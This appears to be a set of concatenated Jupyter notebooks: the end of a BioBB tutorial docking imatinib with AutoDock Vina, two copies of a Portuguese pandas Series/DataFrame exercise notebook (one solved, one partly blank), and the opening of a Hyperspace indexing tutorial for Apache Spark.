2021-05-17 15:45:10,807 [MainThread ] [INFO ] Binding site center (Angstroms): 18.588 -3.586 -17.901
2021-05-17 15:45:10,808 [MainThread ] [INFO ] Adding 12.0 Angstroms offset
2021-05-17 15:45:10,809 [MainThread ] [INFO ] Binding site size (Angstroms): 18.884 25.442 23.006
2021-05-17 15:45:10,811 [MainThread ] [INFO ] Volume (cubic Angstroms): 88425
2021-05-17 15:45:10,812 [MainThread ] [INFO ] Adding box coordinates
2021-05-17 15:45:10,814 [MainThread ] [INFO ] Saving output PDB file (with box setting annotations): box.pdb
###Markdown
Visualizing binding site box in 3D structureVisualizing the **protein structure**, the **selected cavity**, and the **generated box**, all together using **NGL** viewer. Using the **original structure** with the **small ligand** inside (Imatinib, [STI](https://www.rcsb.org/ligand/STI)), to check that the **selected cavity** is placed in the **same region** as the **original ligand**.
###Code
view = nglview.NGLWidget()
s = view.add_component(download_pdb)
b = view.add_component(output_box)
p = view.add_component(fpocket_pocket)
p.clear()
atomPair = [
[ "9999:Z.ZN1", "9999:Z.ZN2" ],
[ "9999:Z.ZN2", "9999:Z.ZN4" ],
[ "9999:Z.ZN4", "9999:Z.ZN3" ],
[ "9999:Z.ZN3", "9999:Z.ZN1" ],
[ "9999:Z.ZN5", "9999:Z.ZN6" ],
[ "9999:Z.ZN6", "9999:Z.ZN8" ],
[ "9999:Z.ZN8", "9999:Z.ZN7" ],
[ "9999:Z.ZN7", "9999:Z.ZN5" ],
[ "9999:Z.ZN1", "9999:Z.ZN5" ],
[ "9999:Z.ZN2", "9999:Z.ZN6" ],
[ "9999:Z.ZN3", "9999:Z.ZN7" ],
[ "9999:Z.ZN4", "9999:Z.ZN8" ]
]
# structure
s.add_representation(repr_type='cartoon',
selection='not het',
color='#cccccc',
opacity=.2)
# ligands box
b.add_representation(repr_type='ball+stick',
selection='9999',
color='pink',
aspectRatio = 8)
# lines box
b.add_representation(repr_type='distance',
atomPair= atomPair,
labelVisible=False,
color= 'black')
# pocket
p.add_surface(component=mdsel.value,
color='skyblue',
surfaceType= 'av',
lowResolution= True,
# 0: low resolution
smooth=1,
contour=True,
opacity=0.4,
useWorker= True,
wrap= True )
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view.render_image()
view.download_image(filename='ngl4.png')
view
###Output
_____no_output_____
###Markdown
*** Downloading Small Molecule Downloading the desired **small molecule** to be used in the **docking procedure**. In this particular example, the small molecule of interest is the FDA-approved drug **Imatinib**, with PDB code **STI**.*****Building Blocks** used: - [ideal_sdf](https://biobb-io.readthedocs.io/en/latest/api.htmlmodule-api.ideal_sdf) from **biobb_io.api.ideal_sdf*****
###Code
from biobb_io.api.ideal_sdf import ideal_sdf
sdf_ideal = "ideal.sdf"
prop = {
"ligand_code": ligand_code
}
ideal_sdf(output_sdf_path=sdf_ideal,
properties=prop)
###Output
2021-05-17 15:45:17,292 [MainThread ] [INFO ] Downloading: STI from: ftp://ftp.ebi.ac.uk/pub/databases/msd/pdbechem/files/sdf/STI.sdf
2021-05-17 15:45:17,294 [MainThread ] [INFO ] Writting sdf to: ideal.sdf
###Markdown
*** Converting Small Molecule Converting the desired **small molecule** to be used in the **docking procedure**, from **SDF** format to **PDB** format using the **OpenBabel chemoinformatics** tool. *****Building Blocks** used: - [babel_convert](https://biobb-chemistry.readthedocs.io/en/latest/babelm.htmlmodule-babelm.babel_convert) from **biobb_chemistry.babelm.babel_convert*****
###Code
from biobb_chemistry.babelm.babel_convert import babel_convert
ligand = "ligand.pdb"
prop = {
"input_format": "sdf",
"output_format": "pdb",
"obabel_path": "obabel"
}
babel_convert(input_path = sdf_ideal,
output_path = ligand,
properties=prop)
###Output
2021-05-17 15:45:19,010 [MainThread ] [INFO ] Value is not compatible as a coordinates value
2021-05-17 15:45:19,011 [MainThread ] [INFO ] Not using any container
2021-05-17 15:45:19,129 [MainThread ] [INFO ] obabel -isdf ideal.sdf -opdb -Oligand.pdb
2021-05-17 15:45:19,131 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:45:19,131 [MainThread ] [INFO ] 1 molecule converted
###Markdown
*** Preparing Small Molecule (ligand) for DockingPreparing the **small molecule** structure for the **docking procedure**. Converting the **PDB file** to a **PDBQT file** format (AutoDock PDBQT: Protein Data Bank, with Partial Charges (Q), & Atom Types (T)), needed by **AutoDock Vina**. The process adds **partial charges** and **atom types** to every atom. Besides, the **ligand flexibility** is also defined in the information contained in the file. The concept of **"torsion tree"** is used to represent the **rigid and rotatable** pieces of the **ligand**. A rigid piece (**"root"**) is defined, with zero or more rotatable pieces (**"branches"**), hanging from the root, and defining the **rotatable bonds**.More info about **PDBQT file format** can be found in the [AutoDock FAQ pages](http://autodock.scripps.edu/faqs-help/faq/what-is-the-format-of-a-pdbqt-file).*****Building Blocks** used: - [babel_convert](https://biobb-chemistry.readthedocs.io/en/latest/babelm.htmlmodule-babelm.babel_convert) from **biobb_chemistry.babelm.babel_convert*****
###Code
from biobb_chemistry.babelm.babel_convert import babel_convert
prep_ligand = "prep_ligand.pdbqt"
prop = {
"input_format": "pdb",
"output_format": "pdbqt",
"obabel_path": "obabel"
}
babel_convert(input_path = ligand,
output_path = prep_ligand,
properties=prop)
###Output
2021-05-17 15:45:21,318 [MainThread ] [INFO ] Value is not compatible as a coordinates value
2021-05-17 15:45:21,321 [MainThread ] [INFO ] Not using any container
2021-05-17 15:45:21,399 [MainThread ] [INFO ] obabel -ipdb ligand.pdb -opdbqt -Oprep_ligand.pdbqt
2021-05-17 15:45:21,400 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:45:21,401 [MainThread ] [INFO ] 1 molecule converted
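To get a feeling for the **torsion tree** that was just encoded, the **PDBQT** records can be inspected directly with a few lines of Python. A minimal sketch (plain-text parsing of the `prep_ligand.pdbqt` file generated above; ROOT/BRANCH/TORSDOF are the standard AutoDock PDBQT record names):
```python
# Count the torsion-tree records in the ligand PDBQT: ROOT/ENDROOT delimit the rigid core,
# each BRANCH record opens a rotatable bond, and TORSDOF reports the torsional degrees of freedom.
with open(prep_ligand) as f:
    pdbqt_lines = f.readlines()
n_branches = sum(1 for line in pdbqt_lines if line.startswith("BRANCH"))
torsdof = [line.split()[1] for line in pdbqt_lines if line.startswith("TORSDOF")]
print("Rotatable bonds (BRANCH records):", n_branches)
print("Torsional degrees of freedom (TORSDOF):", torsdof[0] if torsdof else "n/a")
```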
###Markdown
Visualizing small molecule (drug)Visualizing the desired **drug** to be docked to the **target protein**, using **NGL viewer**.- **Left panel**: **PDB-formatted** file, with all hydrogen atoms.- **Right panel**: **PDBqt-formatted** file (AutoDock Vina-compatible), with **united atom model** (only polar hydrogens are placed in the structures to correctly type heavy atoms as hydrogen bond donors).
###Code
from ipywidgets import HBox
v0 = nglview.show_structure_file(ligand)
v1 = nglview.show_structure_file(prep_ligand)
v0._set_size('500px', '')
v1._set_size('500px', '')
def on_change(change):
v1._set_camera_orientation(change['new'])
v0.observe(on_change, ['_camera_orientation'])
HBox([v0, v1])
###Output
_____no_output_____
###Markdown
*** Preparing Target Protein for DockingPreparing the **target protein** structure for the **docking procedure**. Converting the **PDB file** to a **PDBqt file**, needed by **AutoDock Vina**. Similarly to the previous step, the process adds **partial charges** and **atom types** to every target protein atom. In this case, however, we are not taking into account **receptor flexibility**, although **Autodock Vina** allows some limited flexibility of selected **receptor side chains** [(see the documentation)](https://autodock-vina.readthedocs.io/en/latest/docking_flexible.html).*****Building Blocks** used: - [str_check_add_hydrogens](https://biobb-structure-utils.readthedocs.io/en/latest/utils.htmlutils-str-check-add-hydrogens-module) from **biobb_structure_utils.utils.str_check_add_hydrogens*****
###Code
from biobb_structure_utils.utils.str_check_add_hydrogens import str_check_add_hydrogens
prep_receptor = "prep_receptor.pdbqt"
prop = {
"charges": True,
"mode": "auto"
}
str_check_add_hydrogens(input_structure_path = pdb_protein,
output_structure_path = prep_receptor,
properties=prop)
###Output
2021-05-17 15:45:26,940 [MainThread ] [INFO ] check_structure -i /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/pdb_protein.pdb -o prep_receptor.pdbqt --force_save add_hydrogen --add_charges --add_mode auto
2021-05-17 15:45:26,942 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:45:26,943 [MainThread ] [INFO ] ===============================================================================
= BioBB structure checking utility v3.7.2 =
= A. Hospital, P. Andrio, J.L. Gelpi 2018-20 =
===============================================================================
Warning: sequence features only available in mmCIF format or with external fasta input
Structure /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/pdb_protein.pdb loaded
Title:
Experimental method: unknown
Resolution: None A
Num. models: 1
Num. chains: 1 (A: Protein)
Num. residues: 329
Num. residues with ins. codes: 0
Num. HETATM residues: 0
Num. ligands or modified residues: 0
Num. water mol.: 0
Num. atoms: 2668
Running add_hydrogen. Options: --add_charges --add_mode auto
107 Residues requiring selection on adding H atoms
CYS A39,A119,A162,A211
ASP A43,A88,A101,A112,A124,A125,A145,A150,A161,A168,A205,A227,A230,A283,A292,A294,A313,A315,A316,A321,A324,A331,A335,A343
GLU A12,A19,A22,A71,A81,A97,A98,A160,A163,A192,A215,A245,A253,A286,A317,A328,A336,A344
HIS A64,A77,A80,A107,A126,A142,A148,A199,A228,A305,A312
LYS A15,A45,A53,A54,A66,A76,A79,A118,A121,A139,A152,A165,A233,A248,A249,A267,A287,A295,A338
ARG A5,A10,A23,A49,A57,A67,A70,A73,A94,A136,A149,A186,A189,A220,A237,A256,A296,A330
TYR A9,A24,A69,A103,A132,A140,A188,A200,A258,A307,A311,A323,A342
WARNING: fixing side chains, override with --no_fix_side
Running fixside. Options: --fix all
1 Residues with missing side chain atoms found
PRO A352
Fixing side chains
PRO A352
Fixed 1 side chain(s)
Checking for steric clashes
No severe clashes detected
No apolar clashes detected
No polar_acceptor clashes detected
No polar_donor clashes detected
No positive clashes detected
No negative clashes detected
Selection: auto
Replacing HIS A64 by HIE
Replacing HIS A77 by HIE
Replacing HIS A80 by HIE
Replacing HIS A107 by HIE
Replacing HIS A126 by HIE
Replacing HIS A142 by HIE
Replacing HIS A148 by HIE
Replacing HIS A199 by HIE
Replacing HIS A228 by HIE
Replacing HIS A305 by HIE
Replacing HIS A312 by HIE
Updating partial charges and atom types
Warning: OXT atom missing in CGLY A31. Run backbone --add_atoms first
Warning: OXT atom missing in CPHE A169. Run backbone --add_atoms first
Warning: OXT atom missing in CPRO A352. Run backbone --add_atoms first
Total assigned charge: -2.07
Final Num. models: 1
Final Num. chains: 1 (A: Protein)
Final Num. residues: 329
Final Num. residues with ins. codes: 0
Final Num. HETATM residues: 0
Final Num. ligands or modified residues: 0
Final Num. water mol.: 0
Final Num. atoms: 5353
Structure saved on prep_receptor.pdbqt
###Markdown
*** Running the DockingRunning the **docking process** with the prepared files:- **ligand**- **target protein**- **binding site box**using **AutoDock Vina**. *****Building Blocks** used: - [autodock_vina_run](https://biobb-vs.readthedocs.io/en/latest/vina.htmlmodule-vina.autodock_vina_run) from **biobb_vs.vina.autodock_vina_run*****
###Code
from biobb_vs.vina.autodock_vina_run import autodock_vina_run
output_vina_pdbqt = "output_vina.pdbqt"
output_vina_log = "output_vina.log"
autodock_vina_run(input_ligand_pdbqt_path = prep_ligand,
input_receptor_pdbqt_path = prep_receptor,
input_box_path = output_box,
output_pdbqt_path = output_vina_pdbqt,
output_log_path = output_vina_log)
###Output
2021-05-17 15:45:29,614 [MainThread ] [INFO ] prep_receptor.pdbqt file ends with END, cleaning
2021-05-17 15:45:29,618 [MainThread ] [INFO ] Executing AutoDock Vina
2021-05-17 15:45:29,619 [MainThread ] [INFO ] Not using any container
2021-05-17 15:46:19,009 [MainThread ] [INFO ] vina --ligand prep_ligand.pdbqt --receptor prep_receptor.pdbqt --center_x=18.588 --center_y=-3.586 --center_z=-17.901 --size_x=18.884 --size_y=25.442 --size_z=23.006 --out output_vina.pdbqt --log output_vina.log
2021-05-17 15:46:19,011 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:46:19,011 [MainThread ] [INFO ] #################################################################
# If you used AutoDock Vina in your work, please cite: #
# #
# O. Trott, A. J. Olson, #
# AutoDock Vina: improving the speed and accuracy of docking #
# with a new scoring function, efficient optimization and #
# multithreading, Journal of Computational Chemistry 31 (2010) #
# 455-461 #
# #
# DOI 10.1002/jcc.21334 #
# #
# Please see http://vina.scripps.edu for more information. #
#################################################################
Detected 8 CPUs
Reading input ... done.
Setting up the scoring function ... done.
Analyzing the binding site ... done.
Using random seed: 243047507
Performing search ...
0% 10 20 30 40 50 60 70 80 90 100%
|----|----|----|----|----|----|----|----|----|----|
***************************************************
done.
Refining results ... done.
mode | affinity | dist from best mode
| (kcal/mol) | rmsd l.b.| rmsd u.b.
-----+------------+----------+----------
1 -11.1 0.000 0.000
2 -9.3 1.869 12.340
3 -9.2 2.350 12.298
4 -9.0 7.739 12.329
5 -8.6 5.738 13.064
6 -8.4 7.785 13.782
7 -8.3 7.038 12.298
Writing output ... done.
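The affinity table printed above is also written to `output_vina.log`, so it can be loaded into a **pandas DataFrame** for easier inspection or plotting. A minimal sketch (simple text parsing; the column layout is assumed to match the table shown in the log above):
```python
import re
import pandas as pd

# Parse the "mode | affinity | rmsd l.b. | rmsd u.b." table from the AutoDock Vina log file.
pose_rows = []
with open(output_vina_log) as log:
    for line in log:
        match = re.match(r"^\s*(\d+)\s+(-?\d+\.\d+)\s+(\d+\.\d+)\s+(\d+\.\d+)\s*$", line)
        if match:
            pose_rows.append([int(match.group(1))] + [float(g) for g in match.groups()[1:]])

poses_df = pd.DataFrame(pose_rows, columns=["mode", "affinity_kcal_mol", "rmsd_lb", "rmsd_ub"])
print(poses_df)
```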
###Markdown
Visualizing docking output posesVisualizing the generated **docking poses** for the **ligand**, using **NGL viewer**. - **Left panel**: **Docking poses** displayed with atoms coloured by **partial charges** and **licorice** representation.- **Right panel**: **Docking poses** displayed with atoms coloured by **element** and **ball-and-stick** representation.
###Code
from ipywidgets import HBox
models = 'all'
v0 = nglview.show_structure_file(output_vina_pdbqt, default=False)
v0.add_representation(repr_type='licorice',
selection=models,
colorScheme= 'partialCharge')
v0.center()
v1 = nglview.show_structure_file(output_vina_pdbqt, default=False)
v1.add_representation(repr_type='ball+stick',
selection=models)
v1.center()
v0._set_size('500px', '')
v1._set_size('500px', '')
def on_change(change):
v1._set_camera_orientation(change['new'])
v0.observe(on_change, ['_camera_orientation'])
HBox([v0, v1])
###Output
_____no_output_____
###Markdown
Select Docking PoseSelect a specific **docking pose** from the output list for **visual inspection**.Choose a **docking pose** from the **DropDown list**.
###Code
from Bio.PDB import PDBParser
parser = PDBParser(QUIET = True)
structure = parser.get_structure("protein", output_vina_pdbqt)
models = []
for i, m in enumerate(structure):
models.append(('model' + str(i), i))
mdsel = ipywidgets.Dropdown(
options=models,
description='Sel. model:',
disabled=False,
)
display(mdsel)
###Output
_____no_output_____
###Markdown
*** Extract a Docking PoseExtract a specific **docking pose** from the **docking** outputs. *****Building Blocks** used: - [extract_model_pdbqt](https://biobb-vs.readthedocs.io/en/latest/utils.htmlmodule-utils.extract_model_pdbqt) from **biobb_vs.utils.extract_model_pdbqt*****
###Code
from biobb_vs.utils.extract_model_pdbqt import extract_model_pdbqt
output_pdbqt_model = "output_model.pdbqt"
prop = {
"model": mdsel.value + 1
}
extract_model_pdbqt(input_pdbqt_path = output_vina_pdbqt,
output_pdbqt_path = output_pdbqt_model,
properties=prop)
###Output
2021-05-17 15:46:56,618 [MainThread ] [INFO ] Saving model 1 to output_model.pdbqt
###Markdown
*** Converting Ligand Pose to PDB formatConverting **ligand pose** to **PDB format**. *****Building Blocks** used: - [babel_convert](https://biobb-chemistry.readthedocs.io/en/latest/babelm.htmlmodule-babelm.babel_convert) from **biobb_chemistry.babelm.babel_convert*****
###Code
from biobb_chemistry.babelm.babel_convert import babel_convert
output_pdb_model = "output_model.pdb"
prop = {
"input_format": "pdbqt",
"output_format": "pdb",
"obabel_path": "obabel"
}
babel_convert(input_path = output_pdbqt_model,
output_path = output_pdb_model,
properties=prop)
###Output
2021-05-17 15:46:58,600 [MainThread ] [INFO ] Value is not compatible as a coordinates value
2021-05-17 15:46:58,602 [MainThread ] [INFO ] Not using any container
2021-05-17 15:46:58,658 [MainThread ] [INFO ] obabel -ipdbqt output_model.pdbqt -opdb -Ooutput_model.pdb
2021-05-17 15:46:58,659 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:46:58,660 [MainThread ] [INFO ] 1 molecule converted
###Markdown
*** Superposing Ligand Pose to the Target Protein StructureSuperposing **ligand pose** to the target **protein structure**, in order to see the **protein-ligand docking conformation**. Building a new **PDB file** with both **target and ligand** (binding pose) structures. *****Building Blocks** used: - [cat_pdb](https://biobb-structure-utils.readthedocs.io/en/latest/utils.htmlmodule-utils.cat_pdb) from **biobb_structure_utils.utils.cat_pdb*****
###Code
from biobb_structure_utils.utils.cat_pdb import cat_pdb
output_structure = "output_structure.pdb"
cat_pdb(input_structure1 = pdb_protein,
input_structure2 = output_pdb_model,
output_structure_path = output_structure)
###Output
2021-05-17 15:47:00,632 [MainThread ] [INFO ] File output_structure.pdb created
###Markdown
Comparing final result with experimental structure Visualizing and comparing the generated **protein-ligand** complex with the original **protein-ligand conformation** (downloaded from the PDB database), using **NGL viewer**. - **Licorice, element-colored** representation: **Experimental pose**.- **Licorice, green-colored** representation: **Docking pose**.Note that outputs from **AutoDock Vina** don't contain all the atoms, as the program works with a **united-atom representation** (i.e. only polar hydrogens).
###Code
view = nglview.NGLWidget()
# v1 = Experimental Structure
v1 = view.add_component(download_pdb)
v1.clear()
v1.add_representation(repr_type='licorice',
selection='STI',
radius=0.5)
# v2 = Docking result
v2 = view.add_component(output_structure)
v2.clear()
v2.add_representation(repr_type='cartoon', colorScheme = 'sstruc')
v2.add_representation(repr_type='licorice', radius=0.5, color= 'green', selection='UNL')
view._remote_call('setSize', target='Widget', args=['','600px'])
view
# align reference and output
code = """
var stage = this.stage;
var clist_len = stage.compList.length;
var i = 0;
var s = [];
for(i = 0; i <= clist_len; i++){
if(stage.compList[i] != undefined && stage.compList[i].structure != undefined) {
s.push(stage.compList[i])
}
}
NGL.superpose(s[0].structure, s[1].structure, true, ".CA")
s[ 0 ].updateRepresentations({ position: true })
s[ 0 ].autoView()
"""
view._execute_js_code(code)
view.render_image()
view.download_image(filename='ngl7.png')
view
###Output
_____no_output_____ |
prof_05_pandas_exercicios_series.ipynb | ###Markdown
Pandas Exercises---
###Code
# do your imports here
import pandas as pd
###Output
_____no_output_____
###Markdown
EX01Series creation and methods.
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
###Output
_____no_output_____
###Markdown
__A.__ Create a series with the data from the list provided. Use pd.Series and assign the series to the variable s_temperaturas
###Code
s_temperaturas = pd.Series(temperaturas)
###Output
_____no_output_____
###Markdown
__B.__ Print the type of the s_temperaturas object
###Code
type(s_temperaturas)
###Output
_____no_output_____
###Markdown
__C.__ Print the s_temperaturas object
###Code
print(s_temperaturas)
###Output
0 15.4
1 18.0
2 22.5
3 20.0
4 20.3
5 25.0
dtype: float64
###Markdown
__D.__ Print the number of rows in the object
###Code
s_temperaturas.shape
###Output
_____no_output_____
###Markdown
__E.__ Print the first 2 rows
###Code
s_temperaturas.head(2)
###Output
_____no_output_____
###Markdown
__F__. Print the last 2 rows
###Code
s_temperaturas.tail(2)
###Output
_____no_output_____
###Markdown
__G__. Print the largest value
###Code
s_temperaturas.max()
###Output
_____no_output_____
###Markdown
__H__. Print the smallest value
###Code
s_temperaturas.min()
###Output
_____no_output_____
###Markdown
__J__. Use the describe method to view basic statistics of the series
###Code
s_temperaturas.describe()
###Output
_____no_output_____
###Markdown
EX02Filters and expressions on series. __A.__ Create a series with the temperaturas and indice variables defined below
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
indice = pd.to_datetime(['2017-05-03','2017-05-04','2017-05-04','2017-05-05','2017-05-06','2017-05-07'])
s_temperaturas = pd.Series(temperaturas, index=indice)
s_temperaturas.head()
###Output
_____no_output_____
###Markdown
__B.__ Filter the records by the index 2017-05-04
###Code
s_temperaturas['2017-05-04']
###Output
_____no_output_____
###Markdown
__C.__ Filter the records by the interval 2017-05-04 to 2017-05-06
###Code
s_temperaturas['2017-05-04':'2017-05-06']
###Output
_____no_output_____
###Markdown
__D.__ Filter the records at positions 1 to 3
###Code
s_temperaturas[1:4]
###Output
_____no_output_____
###Markdown
__E.__ Filter the records with temperature greater than 20
###Code
s_temperaturas[s_temperaturas > 20]
###Output
_____no_output_____
###Markdown
EX03Creating DataFrames and their characteristics. __A.__ Create a dataframe using the list of tuples below.
###Code
# use this variable for the column names
nomes_colunas = ['Espécie', 'Idade', 'Visitas', 'Prioridade']
clinica_veterinaria = [
('Gato', 6.0, 12, 'Sim'),
('Gato', 3.0, 23, 'Sim'),
('Cachorro', 10.0, 14, 'Sim'),
('Ramster', 4.0, 5, 'Não'),
('Tartaruga', 10.0, 11, 'Sim'),
('Tartaruga', 3.0, 2, 'Sim'),
('Gato', 12.0, 3, 'Não'),
('Ramster', 11.0, 26, 'Não'),
('Gato', 5.5, 29, 'Não'),
('Cachorro', 2.0, 28, 'Sim'),
('Coelho', 5.5, 1, 'Sim'),
('Tartaruga', 4.0, 21, 'Não'),
('Ramster', 1.0, 28, 'Sim'),
('Tartaruga', 3.5, 18, 'Não'),
('Ramster', 3.0, 20, 'Não'),
('Gato', 2.0, 16, 'Não'),
('Tartaruga', 10.5, 29, 'Não'),
('Cachorro', 10.5, 26, 'Sim'),
('Coelho', 10.0, 26, 'Sim'),
('Ramster', 9.5, 2, 'Não')
]
# create the dataframe and assign it to the variable 'df_clinica_veterinaria'
df_clinica_veterinaria = pd.DataFrame(clinica_veterinaria, columns=nomes_colunas)
# display the first 5 rows
df_clinica_veterinaria.head()
###Output
_____no_output_____
###Markdown
__B.__ Create a new column with the result of the number of visits divided by the age. The column name must be "Visitas/Idade"
###Code
df_clinica_veterinaria['Visitas/Idade'] = df_clinica_veterinaria['Visitas']/df_clinica_veterinaria['Idade']
df_clinica_veterinaria.head()
###Output
_____no_output_____
###Markdown
__C.__ Sort the DataFrame by the new "Visitas/Idade" column in descending order
###Code
df_clinica_veterinaria.sort_values('Visitas/Idade', ascending=False).head()
###Output
_____no_output_____
###Markdown
__D.__ Select all records with dogs
###Code
df_clinica_veterinaria[df_clinica_veterinaria['Espécie'] == 'Cachorro']
###Output
_____no_output_____
###Markdown
__E.__ Select all records with cats older than 4 years
###Code
expressao = df_clinica_veterinaria['Espécie'] == 'Gato'
expressao &= df_clinica_veterinaria['Idade'] > 4
# expressao = expressao & df_clinica_veterinaria['Idade'] > 4
df_clinica_veterinaria[expressao]
###Output
_____no_output_____
###Markdown
__F.__ What is the total number of visits recorded at the clinic?
###Code
df_clinica_veterinaria['Visitas'].sum()
###Output
_____no_output_____
###Markdown
__G.__ Is there any Ramster with priority?
###Code
expressao = df_clinica_veterinaria['Espécie'] == 'Ramster'
expressao &= df_clinica_veterinaria['Prioridade'] == 'Sim'
df_clinica_veterinaria[expressao]
expressao = df_clinica_veterinaria['Espécie'] == 'Ramster'  # answer the yes/no question with .any()
expressao &= df_clinica_veterinaria['Prioridade'] == 'Sim'
expressao.any()
###Output
_____no_output_____
###Markdown
__H.__ What is the maximum age per species?
###Code
df_clinica_veterinaria[['Espécie', 'Idade']]\
.groupby('Espécie', as_index=False).max()
###Output
_____no_output_____
###Markdown
__I.__ What is the average age per species?
###Code
df_clinica_veterinaria[['Espécie', 'Idade']]\
.groupby('Espécie', as_index=False).mean().sort_values('Idade', ascending=False)
# Client generator for the veterinary clinic (numpy is needed here but was not imported above)
import numpy as np
sorteio_animais = ['Gato', 'Cachorro', 'Coelho', 'Ramster', 'Tartaruga']
sorteio_idades = list(np.arange(0.5, 13.0, step=0.5))
sorteio_visitas = list(np.arange(1, 30))
sorteio_prioridade = ['Sim', 'Não']
clinica_veterinaria = [(np.random.choice(sorteio_animais),
np.random.choice(sorteio_idades),
np.random.choice(sorteio_visitas),
np.random.choice(sorteio_prioridade),
) for i in range(20)
]
clinica_veterinaria
###Output
_____no_output_____
###Markdown
Pandas Exercises---
###Code
# do your imports here
import pandas as pd
###Output
_____no_output_____
###Markdown
EX01Series creation and methods.
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
###Output
_____no_output_____
###Markdown
__A.__ Create a series with the data from the list provided. Use pd.Series and assign the series to the variable s_temperaturas
###Code
s_temperaturas = pd.Series(temperaturas)
s_temperaturas.head()
###Output
_____no_output_____
###Markdown
__B.__ Print the type of the s_temperaturas object
###Code
type(s_temperaturas)
###Output
_____no_output_____
###Markdown
__C.__ Print the s_temperaturas object
###Code
s_temperaturas
###Output
_____no_output_____
###Markdown
__D.__ Print the number of rows in the object
###Code
s_temperaturas.shape[0]
###Output
_____no_output_____
###Markdown
__E.__ Print the first 2 rows
###Code
s_temperaturas.head(2)
###Output
_____no_output_____
###Markdown
__F__. Print the last 2 rows
###Code
s_temperaturas.tail(2)
###Output
_____no_output_____
###Markdown
__G__. Print the largest value
###Code
s_temperaturas.max()
###Output
_____no_output_____
###Markdown
__H__. Print the smallest value
###Code
s_temperaturas.min()
###Output
_____no_output_____
###Markdown
__J__. Use the describe method to view basic statistics of the series
###Code
s_temperaturas.describe()
###Output
_____no_output_____
###Markdown
EX02Filters and expressions on series. __A.__ Create a series with the temperaturas and indice variables defined below
###Code
temperaturas = [15.4, 18.0, 22.5, 20.0, 20.3, 25.0]
indice = pd.to_datetime(['2017-05-03','2017-05-04','2017-05-04','2017-05-05','2017-05-06','2017-05-07'])
s_temperaturas = pd.Series(temperaturas, index=indice)
s_temperaturas.head()
###Output
_____no_output_____
###Markdown
__B.__ Filter the records by the index 2017-05-04
###Code
s_temperaturas['2017-05-04']
###Output
_____no_output_____
###Markdown
__C.__ Filter the records by the interval 2017-05-04 to 2017-05-06
###Code
s_temperaturas.loc['2017-05-04':'2017-05-06']
###Output
_____no_output_____
###Markdown
__D.__ Filter the records at positions 1 to 3
###Code
s_temperaturas.iloc[1:4]
###Output
_____no_output_____
###Markdown
__E.__ Filter the records with temperature greater than 20
###Code
s_temperaturas[ s_temperaturas > 20 ]
###Output
_____no_output_____
###Markdown
EX03Creating DataFrames and their characteristics. __A.__ Create a dataframe using the list of tuples below.
###Code
# use this variable for the column names
nomes_colunas = ['Espécie', 'Idade', 'Visitas', 'Prioridade']
clinica_veterinaria = [
('Gato', 6.0, 12, 'Sim'),
('Gato', 3.0, 23, 'Sim'),
('Cachorro', 10.0, 14, 'Sim'),
('Ramster', 4.0, 5, 'Não'),
('Tartaruga', 10.0, 11, 'Sim'),
('Tartaruga', 3.0, 2, 'Sim'),
('Gato', 12.0, 3, 'Não'),
('Ramster', 11.0, 26, 'Não'),
('Gato', 5.5, 29, 'Não'),
('Cachorro', 2.0, 28, 'Sim'),
('Coelho', 5.5, 1, 'Sim'),
('Tartaruga', 4.0, 21, 'Não'),
('Ramster', 1.0, 28, 'Sim'),
('Tartaruga', 3.5, 18, 'Não'),
('Ramster', 3.0, 20, 'Não'),
('Gato', 2.0, 16, 'Não'),
('Tartaruga', 10.5, 29, 'Não'),
('Cachorro', 10.5, 26, 'Sim'),
('Coelho', 10.0, 26, 'Sim'),
('Ramster', 9.5, 2, 'Não')
]
# create the dataframe and assign it to the variable 'df_clinica_veterinaria'
# display the first 5 rows
###Output
_____no_output_____
###Markdown
__B.__ Create a new column with the result of the number of visits divided by the age. The column name must be "Visitas/Idade" __C.__ Sort the DataFrame by the new "Visitas/Idade" column in descending order __D.__ Select all records with dogs __E.__ Select all records with cats older than 4 years __F.__ What is the total number of visits recorded at the clinic? __G.__ Is there any Ramster with priority? __H.__ What is the maximum age per species? __I.__ What is the average age per species?
###Code
# Client generator for the veterinary clinic (numpy is needed here but was not imported above)
import numpy as np
sorteio_animais = ['Gato', 'Cachorro', 'Coelho', 'Ramster', 'Tartaruga']
sorteio_idades = list(np.arange(0.5, 13.0, step=0.5))
sorteio_visitas = list(np.arange(1, 30))
sorteio_prioridade = ['Sim', 'Não']
clinica_veterinaria = [(np.random.choice(sorteio_animais),
np.random.choice(sorteio_idades),
np.random.choice(sorteio_visitas),
np.random.choice(sorteio_prioridade),
) for i in range(20)
]
clinica_veterinaria
###Output
_____no_output_____ |
Notebooks/PySpark/Hitchhikers Guide to Hyperspace - Python.ipynb | ###Markdown
Hitchhiker's Guide to Hyperspace (Python) An Indexing Subsystem for Apache Spark™[Hyperspace](https://github.com/microsoft/hyperspace) introduces the ability for Apache Spark™ users to create indexes on their datasets (e.g., CSV, JSON, Parquet etc.) and leverage them for potential query and workload acceleration.In this notebook, we highlight the basics of Hyperspace, emphasizing its simplicity, and show how it can be used by just about anyone.**Disclaimer**: Hyperspace helps accelerate your workloads/queries under two circumstances: 1. Queries contain filters on predicates with high selectivity (e.g., you want to select 100 matching rows from a million candidate rows) 2. Queries contain a join that requires heavy shuffles (e.g., you want to join a 100 GB dataset with a 10 GB dataset)You may want to carefully monitor your workloads and determine whether indexing is helping you on a case-by-case basis. SetupTo begin with, let's start a new Spark™ session. Since this notebook is a tutorial merely to illustrate what Hyperspace can offer, we will make a configuration change that allows us to highlight what Hyperspace is doing on small datasets. By default, Spark™ uses *broadcast join* to optimize join queries when the data size for one side of the join is small (which is the case for the sample data we use in this tutorial). Therefore, we disable broadcast joins so that later when we run join queries, Spark™ uses *sort-merge* join. This is mainly to show how Hyperspace indexes would be used at scale for accelerating join queries.The output of running the cell below shows a reference to the successfully created Spark™ session and prints out '-1' as the value for the modified join config, which indicates that broadcast join is successfully disabled.
###Code
